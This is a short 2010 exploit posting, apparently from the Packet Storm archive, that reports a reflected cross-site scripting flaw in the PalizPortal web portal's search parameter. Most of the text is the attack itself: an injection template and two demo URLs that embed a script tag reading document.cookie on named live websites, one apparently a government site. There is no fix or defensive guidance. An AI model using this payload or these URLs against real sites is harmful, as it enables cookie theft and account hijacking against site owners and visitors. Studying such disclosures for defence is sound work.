PalizPortal Cross Site Scripting

2010-12-17T00:00:00
ID PACKETSTORM:96772
Type packetstorm
Reporter NetQurd
Modified 2010-12-17T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: PalizPortal   
Vulnerability : (XSS)  
software : http://www.palizct.com   
Author : netqurd - netqurd@live.com  
homepage : www.attackerz.ir  
spt : d3c0der - blackl0rd - bl4ck.sc0rpi0n  
---------------------------------------------------------  
  
  
#########################################################  
  
[xss] :  
http://site.com/[Path]/Page.aspx?search=1[xss]&mID=1672&Page=search/advancedsearch  
  
---------------------------------  
  
demo :   
  
http://iczm.pmo.ir/portal/Page.aspx?search=1<script >alert(document.cookie)</script>&mID=1672&Page=search/advancedsearch   
  
http://www.ittic.com/safarcard/Page.aspx?search=1<script >alert(document.cookie)</script>&mID=1672&Page=search/advancedsearch   
  
  
#########################################################  
  
  
  
  
  
`